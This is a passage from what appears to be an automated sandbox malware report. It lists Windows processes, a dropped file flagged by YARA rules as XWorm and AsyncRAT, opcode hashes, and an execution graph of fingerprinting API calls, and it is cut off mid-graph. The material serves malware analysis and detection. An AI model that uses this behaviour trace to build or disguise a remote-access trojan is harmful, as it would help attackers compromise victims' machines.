                                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:13
                                                Start time:18:31:06
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:14
                                                Start time:18:31:07
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:15
                                                Start time:18:31:07
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:16
                                                Start time:18:31:08
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:17
                                                Start time:18:31:09
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:18
                                                Start time:18:31:09
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:19
                                                Start time:18:31:10
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:20
                                                Start time:18:31:10
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:21
                                                Start time:18:31:10
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:22
                                                Start time:18:31:11
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:23
                                                Start time:18:31:11
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:24
                                                Start time:18:31:11
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:25
                                                Start time:18:31:11
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:26
                                                Start time:18:31:12
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:27
                                                Start time:18:31:12
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:28
                                                Start time:18:31:13
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:29
                                                Start time:18:31:13
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:30
                                                Start time:18:31:14
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:31
                                                Start time:18:31:14
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:33
                                                Start time:18:31:15
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:34
                                                Start time:18:31:16
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\spoolsv.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\spoolsv.exe
                                                Imagebase:0x7ff646ff0000
                                                File size:842'752 bytes
                                                MD5 hash:0D4B1E3E4488E9BDC035F23E1F4FE22F
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:35
                                                Start time:18:31:16
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:36
                                                Start time:18:31:17
                                                Start date:01/07/2024
                                                Path:C:\Users\user\AppData\Local\x4usb.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\AppData\Local\x4usb.exe"
                                                Imagebase:0x820000
                                                File size:70'144 bytes
                                                MD5 hash:FD744070409A72B86CC2B344D1719B33
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\x4usb.exe, Author: Joe Security
                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\x4usb.exe, Author: Joe Security
                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\x4usb.exe, Author: ditekSHen
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 92%, ReversingLabs
                                                Has exited:true

                                                Target ID:37
                                                Start time:18:31:18
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:40
                                                Start time:18:31:18
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:41
                                                Start time:18:31:19
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:42
                                                Start time:18:31:19
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Reset < >
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1710004531.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_x433.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 05aab8f8705c73d149087c198e545b9657b5a53b5efd384f52ec284737716657
                                                  • Instruction ID: 7ab8e5a6f7b0ae991d39b2345d73585bf4f04c7eabbf41b943f721d0ab2a49bf
                                                  • Opcode Fuzzy Hash: 05aab8f8705c73d149087c198e545b9657b5a53b5efd384f52ec284737716657
                                                  • Instruction Fuzzy Hash: 7BD1C230B1991D8FDFA9EB68C464EBD77E1FF58710B114679E42AC32E6CE34A9418740
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1710004531.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_x433.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 3CN_^
                                                  • API String ID: 0-3949952865
                                                  • Opcode ID: fff4771d7444e6776cbef928258ad06a5820b51d5751cf50c66602b38f16b131
                                                  • Instruction ID: 765fc6a708b7951cd01690eb954bed981434bb9b1f619a67f6c2299eba5ebc5a
                                                  • Opcode Fuzzy Hash: fff4771d7444e6776cbef928258ad06a5820b51d5751cf50c66602b38f16b131
                                                  • Instruction Fuzzy Hash: F6514621F1EA8A4FFF6A67B848356F97F90EF16704F0901BAC059871E3DD18A9048382
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1710004531.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_x433.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7ed98e907f5e7201628cb35870ebcd143b11e18dc202530753c9398113df9f09
                                                  • Instruction ID: a533e96115972c2b52263a392ac64e1d88ee138eff2fb84644db465f533c603f
                                                  • Opcode Fuzzy Hash: 7ed98e907f5e7201628cb35870ebcd143b11e18dc202530753c9398113df9f09
                                                  • Instruction Fuzzy Hash: A741E461B1D7895FEB69EB7C58697A47FE1EFA9200F0901FBE048C72E7DD2859018342
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1710004531.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_x433.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8f04b1ecad120f27553a1b144e0e70ead86fec3e293514ebfae5458d5506d45e
                                                  • Instruction ID: 547d11fface2dca3acec6c241775e248b901996d926598de43e660f48ca63ebb
                                                  • Opcode Fuzzy Hash: 8f04b1ecad120f27553a1b144e0e70ead86fec3e293514ebfae5458d5506d45e
                                                  • Instruction Fuzzy Hash: 6EA1E961B1DA495FEB9CEB6C58697B8BBD2EF9C310F4901BAE00DC72D6DE2858418341
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1710004531.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_x433.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c8051f6c6a9323365a3789a390e5ce0d94119e39df3cca4775705e245f8fe698
                                                  • Instruction ID: a936437dbd50a64f56522f8d178b18097f8bc6a897b92b5d471bdc76fa9e65e2
                                                  • Opcode Fuzzy Hash: c8051f6c6a9323365a3789a390e5ce0d94119e39df3cca4775705e245f8fe698
                                                  • Instruction Fuzzy Hash: BD51D761B1DA495FEF98EB7C58697B8B7D2EF9C210F45017AE00DC73D6DE28A8424341
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1710004531.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_x433.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c1f5fb19fdad9849ac5c8d5a84a4d28ffa0d98f17de31ec6082670006fbf9d39
                                                  • Instruction ID: af97134ba81ee9785fd6aaf8559a72a579a631f244354ea05abe01a506b44aba
                                                  • Opcode Fuzzy Hash: c1f5fb19fdad9849ac5c8d5a84a4d28ffa0d98f17de31ec6082670006fbf9d39
                                                  • Instruction Fuzzy Hash: 4511E931B19A094FDF98EB6C98615BA7BE1EF88710B8445BDE40CC72DADD2469828381
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1710004531.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_x433.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba92e3f9b88ec11fafc87f2f89647678b0c9e2ee069fbdb226fb792c2ba88e53
                                                  • Instruction ID: edb5878e29afd68d8398e950c52835458e5e62d6a2b8bae6c699124295f3ae5d
                                                  • Opcode Fuzzy Hash: ba92e3f9b88ec11fafc87f2f89647678b0c9e2ee069fbdb226fb792c2ba88e53
                                                  • Instruction Fuzzy Hash: 41012612F1ED491FEBA4A7BC5C656B4ABD1DF9921170902BAE00CC32ABDC085C424381
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1710004531.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_x433.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f1ae589c6bb3b17c0c8e8f7c4671ff6c4b38ba9c5b5b67e9a3daeea803cf5178
                                                  • Instruction ID: 563e2e282e6802f35fbfe1364a212b81d622454d07381e86c1d909aa833e0e58
                                                  • Opcode Fuzzy Hash: f1ae589c6bb3b17c0c8e8f7c4671ff6c4b38ba9c5b5b67e9a3daeea803cf5178
                                                  • Instruction Fuzzy Hash: B4F0F412F0ED0D0BEBA4B6AD1CA9BB596C2DBEC265B55013AE41DC329EDC185C824381
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1710004531.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_x433.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b921f8d2d44954f34411392ab50181b1ff39394c0b9ca106dfa156ec476b5dab
                                                  • Instruction ID: e233bc244cf8612a7e225eb40c9437b4e8aceae868af919f374fdc4cd1be6f41
                                                  • Opcode Fuzzy Hash: b921f8d2d44954f34411392ab50181b1ff39394c0b9ca106dfa156ec476b5dab
                                                  • Instruction Fuzzy Hash: 7AF0F472E18A4C4FDB90EBB848291ED7BF1EF18305F0101AAE458D719AEA3899048B42

                                                  Execution Graph

                                                  Execution Coverage:3%
                                                  Dynamic/Decrypted Code Coverage:90.9%
                                                  Signature Coverage:10.4%
                                                  Total number of Nodes:1147
                                                  Total number of Limit Nodes:26
                                                  execution_graph 11203 7a727a 11204 79fd79 __fassign 38 API calls 11203->11204 11205 7a7290 11204->11205 11206 7a729e 11205->11206 11207 7a72b5 11205->11207 11208 7a15d3 _free 20 API calls 11206->11208 11210 7a72ae 11207->11210 11212 7a75b7 46 API calls 11207->11212 11209 7a72a3 11208->11209 11211 7a1517 _abort 26 API calls 11209->11211 11211->11210 11212->11207 9909 76aaf0 9910 76ab06 9909->9910 9914 76ab57 9910->9914 9915 766490 9910->9915 9912 76ab20 9919 79faf0 9912->9919 9917 765f10 9915->9917 9916 766084 SetFilePointerEx 9916->9917 9917->9912 9917->9915 9917->9916 9918 765d90 9917->9918 9918->9912 9920 79fafd 9919->9920 9923 79fb84 9919->9923 9921 79fb2a 9920->9921 9920->9923 9927 7a032f 9921->9927 9941 7a1a1b 9921->9941 9922 79fc05 9925 79fc38 9922->9925 9937 7a0fe0 9922->9937 9923->9922 9930 79fbda 9923->9930 9925->9914 9927->9914 9930->9925 9931 7a116e 9930->9931 9932 7a1167 9930->9932 9934 7a0fe0 __startOneArgErrorHandling 21 API calls 9931->9934 9951 7a0ff7 9932->9951 9936 7a1173 9934->9936 9936->9914 9938 7a1000 9937->9938 9955 7a1c33 9938->9955 9942 7a1a38 RtlDecodePointer 9941->9942 9944 7a1a48 9941->9944 9942->9944 9943 7a4c0d _abort 5 API calls 9946 7a08d6 9943->9946 9945 7a1ad5 9944->9945 9947 7a1aca 9944->9947 9949 7a1a7f 9944->9949 9945->9947 9948 7a15d3 _free 20 API calls 9945->9948 9946->9914 9947->9943 9948->9947 9949->9947 9950 7a15d3 _free 20 API calls 9949->9950 9950->9947 9952 7a1000 9951->9952 9953 7a1c33 __startOneArgErrorHandling 21 API calls 9952->9953 9954 7a1020 9953->9954 9954->9914 9956 7a1c72 __startOneArgErrorHandling 9955->9956 9961 7a1cf4 __startOneArgErrorHandling 9956->9961 9965 7a3980 9956->9965 9958 7a1d1e 9960 7a1d2a 9958->9960 9972 7a3c94 9958->9972 9979 7a4c0d 9960->9979 9961->9958 9968 7a3655 9961->9968 9964 79fc22 9964->9914 9986 7a39a3 9965->9986 9969 7a367d 9968->9969 9970 7a4c0d _abort 5 API calls 9969->9970 9971 7a369a 9970->9971 9971->9958 9973 7a3ca1 9972->9973 9974 7a3cb6 9972->9974 9975 7a3cbb 9973->9975 9990 7a15d3 9973->9990 9976 7a15d3 _free 20 API calls 9974->9976 9975->9960 9976->9975 9980 7a4c18 IsProcessorFeaturePresent 9979->9980 9981 7a4c16 9979->9981 9983 7a4cb7 9980->9983 9981->9964 10104 7a4c7b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9983->10104 9985 7a4d9a 9985->9964 9987 7a39ce __raise_exc 9986->9987 9988 7a3bc7 RaiseException 9987->9988 9989 7a399e 9988->9989 9989->9961 9993 7a18df GetLastError 9990->9993 9994 7a18f8 9993->9994 9997 7a18fe 9993->9997 10012 7a2206 9994->10012 10000 7a1955 SetLastError 9997->10000 10019 7a2039 9997->10019 9998 7a1918 10026 7a2096 9998->10026 10001 7a15d8 10000->10001 10001->9960 10005 7a191e 10007 7a194c SetLastError 10005->10007 10006 7a1934 10039 7a1797 10006->10039 10007->10001 10010 7a2096 _free 17 API calls 10011 7a1945 10010->10011 10011->10000 10011->10007 10044 7a20ef 10012->10044 10014 7a222d 10015 7a2245 TlsGetValue 10014->10015 10018 7a2239 10014->10018 10015->10018 10016 7a4c0d _abort 5 API calls 10017 7a2256 10016->10017 10017->9997 10018->10016 10024 7a2046 _abort 10019->10024 10020 7a2086 10023 7a15d3 _free 19 API calls 10020->10023 10021 7a2071 RtlAllocateHeap 10022 7a1910 10021->10022 10021->10024 10022->9998 10032 7a225c 10022->10032 10023->10022 10024->10020 10024->10021 10057 7a4356 10024->10057 10027 7a20ca _free 10026->10027 10028 7a20a1 HeapFree 10026->10028 10027->10005 10028->10027 10029 7a20b6 10028->10029 10030 7a15d3 _free 18 API calls 10029->10030 10031 7a20bc GetLastError 10030->10031 10031->10027 10033 7a20ef _abort 5 API calls 10032->10033 10034 7a2283 10033->10034 10035 7a229e TlsSetValue 10034->10035 10036 7a2292 10034->10036 10035->10036 10037 7a4c0d _abort 5 API calls 10036->10037 10038 7a192d 10037->10038 10038->9998 10038->10006 10072 7a176f 10039->10072 10045 7a211f _abort 10044->10045 10046 7a211b 10044->10046 10045->10014 10046->10045 10047 7a213f 10046->10047 10050 7a218b 10046->10050 10047->10045 10049 7a214b GetProcAddress 10047->10049 10049->10045 10051 7a21ac LoadLibraryExW 10050->10051 10052 7a21a1 10050->10052 10053 7a21c9 GetLastError 10051->10053 10055 7a21e1 10051->10055 10052->10046 10053->10055 10056 7a21d4 LoadLibraryExW 10053->10056 10054 7a21f8 FreeLibrary 10054->10052 10055->10052 10055->10054 10056->10055 10062 7a439a 10057->10062 10059 7a4c0d _abort 5 API calls 10060 7a4396 10059->10060 10060->10024 10061 7a436c 10061->10059 10063 7a43a6 _abort 10062->10063 10068 7a2813 RtlEnterCriticalSection 10063->10068 10065 7a43b1 10069 7a43e3 10065->10069 10067 7a43d8 _abort 10067->10061 10068->10065 10070 7a282a _abort RtlLeaveCriticalSection 10069->10070 10071 7a43ea 10070->10071 10071->10067 10078 7a16ff 10072->10078 10074 7a1793 10075 7a1747 10074->10075 10088 7a16af 10075->10088 10077 7a176b 10077->10010 10079 7a170b _abort 10078->10079 10084 7a2813 RtlEnterCriticalSection 10079->10084 10081 7a1715 10085 7a173b 10081->10085 10083 7a1733 _abort 10083->10074 10084->10081 10086 7a282a _abort RtlLeaveCriticalSection 10085->10086 10087 7a1745 10086->10087 10087->10083 10089 7a16bb _abort 10088->10089 10096 7a2813 RtlEnterCriticalSection 10089->10096 10091 7a16c5 10097 7a1810 10091->10097 10093 7a16dd 10101 7a16f3 10093->10101 10095 7a16eb _abort 10095->10077 10096->10091 10098 7a181f __fassign 10097->10098 10100 7a1846 __fassign 10097->10100 10099 7a24ff __fassign 20 API calls 10098->10099 10098->10100 10099->10100 10100->10093 10102 7a282a _abort RtlLeaveCriticalSection 10101->10102 10103 7a16fd 10102->10103 10103->10095 10104->9985 11142 761130 GetPEB 11228 764b70 GetUserDefaultUILanguage 11229 764b82 11228->11229 11168 787df0 11172 787d20 11168->11172 11169 787e06 GetComputerNameW 11174 787d37 11169->11174 11170 787d30 11171 787d6c GetVolumeInformationW 11170->11171 11170->11174 11172->11168 11172->11169 11172->11170 11172->11171 11173 787d83 GetWindowsDirectoryW 11172->11173 11172->11174 11173->11170 11173->11174 10335 7a0070 10336 7a007c 10335->10336 10339 79ffe2 10336->10339 10340 79fff9 10339->10340 10341 7a15d3 _free 20 API calls 10340->10341 10344 7a0047 10340->10344 10342 7a003d 10341->10342 10345 7a1517 10342->10345 10348 7a149c 10345->10348 10347 7a1523 10347->10344 10349 7a18df _abort 20 API calls 10348->10349 10350 7a14b2 10349->10350 10351 7a1511 10350->10351 10355 7a14c0 10350->10355 10359 7a1527 IsProcessorFeaturePresent 10351->10359 10353 7a1516 10354 7a149c _abort 26 API calls 10353->10354 10356 7a1523 10354->10356 10357 7a4c0d _abort 5 API calls 10355->10357 10356->10347 10358 7a14e7 10357->10358 10358->10347 10360 7a1532 10359->10360 10363 7a1361 10360->10363 10364 7a137d _abort 10363->10364 10365 7a13a9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10364->10365 10368 7a147a _abort 10365->10368 10366 7a4c0d _abort 5 API calls 10367 7a1498 GetCurrentProcess TerminateProcess 10366->10367 10367->10353 10368->10366 10878 7a7977 10879 7a7999 10878->10879 10880 7a7984 10878->10880 10892 7a7994 10879->10892 10894 7a7671 10879->10894 10881 7a15d3 _free 20 API calls 10880->10881 10883 